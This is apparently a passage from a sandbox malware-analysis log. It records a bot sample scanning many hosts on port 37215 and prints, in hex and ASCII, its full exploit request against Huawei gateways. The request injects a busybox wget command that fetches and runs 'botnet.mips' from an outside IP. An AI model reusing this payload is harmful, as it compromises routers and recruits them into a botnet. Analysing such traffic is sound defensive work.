      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.38.84.187:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.98.200.201:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.3.93.52:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.52.29.108:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.26.41.36:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.110.177.27:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.80.126.25:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.105.127.127:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.154.183.73:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.22.69.216:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.107.231.82:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.14.92.27:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.101.240.73:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.237.215.91:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.135.38.68:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.64.132.88:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.243.126.9:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.152.38.242:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.162.52.3:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.172.137.166:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.61.154.202:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.1.158.99:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.182.69.122:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.45.122.205:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.244.58.181:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.5.83.163:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.220.29.145:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.246.188.170:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.215.96.80:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.130.210.135:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.51.97.120:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.157.197.252:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.133.25.91:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.79.207.210:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.25.210.29:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.223.78.45:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.253.98.7:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.9.211.216:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.29.87.37:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.189.90.159:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.46.167.116:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.53.38.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.71.64.69:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.167.236.191:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.213.108.48:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.251.219.19:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.172.62.226:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.28.180.206:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.154.71.18:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.151.175.146:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.239.20.142:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.9.57.228:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.197.76.12:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.5.99.131:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.75.68.18:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.165.38.201:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.215.21.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.155.228.177:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.185.8.164:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.24.64.41:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.227.27.178:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.223.216.217:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.121.99.110:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.123.102.18:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.35.141.213:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.68.248.134:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.9.140.161:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.127.255.179:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.47.38.19:37215
      Source: global trafficTCP traffic: 192.168.2.23:56178 -> 199.195.250.211:59666
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.101.127.159:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.105.77.76:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.132.114.244:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.24.89.22:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.80.80.203:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.87.20.207:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.168.107.125:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.224.49.222:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.57.192.136:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.87.42.164:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.199.174.155:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.170.212.251:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.163.213.125:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.168.169.13:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.243.140.169:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.17.20.241:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.39.18.207:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.177.13.226:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.199.48.214:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.14.42.84:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.233.51.204:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.78.38.32:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.66.242.240:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.151.148.148:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.211.26.193:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.27.9.182:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.246.150.123:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.80.153.32:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.35.74.198:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.249.164.180:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.216.197.0:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.185.86.186:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.41.181.230:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.143.227.170:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.178.3.153:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.162.145.99:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.127.88.143:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.60.1.93:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.230.78.21:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.196.25.176:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.246.213.160:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.129.183.233:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.9.201.152:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.118.167.65:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.87.209.9:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.13.33.105:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.63.106.235:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.14.94.242:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.37.164.238:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.22.40.11:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.69.104.209:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.192.231.14:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.138.49.34:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.63.223.228:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.7.191.141:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.146.104.86:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.26.194.79:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.19.173.123:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.159.104.95:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.181.138.13:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.217.203.219:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.67.99.139:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.240.189.19:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.239.68.240:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.181.24.183:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.215.32.105:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.169.22.180:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.29.17.93:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.131.6.85:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.201.247.64:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.9.249.237:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.104.210.104:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.132.18.105:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.59.41.187:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.11.222.33:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.195.194.152:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.46.78.30:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.70.6.130:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.177.98.236:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.155.60.174:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.161.158.153:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.178.185.24:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.228.193.143:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.254.99.198:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.178.110.237:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.158.141.200:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.135.238.127:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.141.73.38:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.92.23.43:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.21.192.142:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.253.34.211:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.53.59.194:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.182.10.115:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.92.85.84:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.14.94.195:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.242.24.165:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.16.245.34:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.41.89.232:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.131.7.208:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.156.66.112:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.183.113.227:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.136.2.9:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.81.213.237:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.39.5.162:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.96.2.171:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.66.77.209:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.62.19.143:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.141.62.8:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.154.147.110:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.47.241.148:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.246.221.162:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.21.211.187:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.40.20.72:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.73.253.85:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.254.59.2:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.72.153.42:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.8.181.93:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.78.224.185:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.205.243.223:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.111.58.194:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.173.162.54:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.58.53.254:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.85.237.190:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.153.31.225:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.46.11.68:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.244.173.184:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.83.87.69:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.231.144.195:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.208.226.203:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.140.160.252:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.82.235.236:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.80.190.219:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.75.79.19:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.88.30.225:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.16.255.85:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.199.173.22:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.6.202.80:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.67.29.193:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.61.113.233:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.124.145.53:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.207.72.164:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.158.1.93:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.111.131.73:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.176.130.97:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.243.10.198:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.112.228.214:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.50.253.176:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.227.2.18:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.202.103.89:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.244.13.165:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.184.157.83:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.38.29.50:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.233.55.255:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.94.57.188:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.47.23.2:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.251.100.222:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.90.172.111:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.81.5.85:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.99.131.251:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.2.19.244:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.125.194.168:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.242.54.252:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.150.3.93:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.135.155.214:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.37.118.21:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.48.227.233:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.98.111.1:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.167.140.146:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.165.212.233:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.135.212.206:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.160.24.212:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.157.85.196:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 197.87.243.92:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.247.233.180:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.94.0.177:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.227.76.74:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 156.172.223.75:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.161.237.253:37215
      Source: global trafficTCP traffic: 192.168.2.23:45409 -> 41.38.237.51:37215
      Source: /tmp/yRo17s2Sbc (PID: 6228)Socket: 127.0.0.1::46157Jump to behavior
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 